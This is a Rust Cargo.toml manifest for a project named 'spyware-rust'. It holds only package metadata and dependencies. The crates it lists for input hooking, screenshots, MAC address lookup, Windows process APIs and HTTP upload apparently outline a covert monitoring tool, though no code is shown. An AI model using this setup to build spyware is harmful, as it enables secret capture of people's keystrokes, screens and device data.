[package]
name = "spyware-rust"
version = "0.1.0"
edition = "2018"

# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html


[dependencies]
serde = "1"
serde_json = "1.0"
reqwest = { version = "0.11", features = ["json"] }
tokio = { version = "1", features = ["full"] }
inputbot = "0.3"
winapi = { version = "0.3", features = ["psapi", "winbase", "tlhelp32","winuser", "std", "libloaderapi", "errhandlingapi", "winnls"] }
mac_address = "1.1.5"
win-screenshot = "4.0.5"
base64 = "0.13"
regex = "1.9.5"
image = "0.24.7"
winmm-sys = "*"
user32-sys = "*"
kernel32-sys = "*"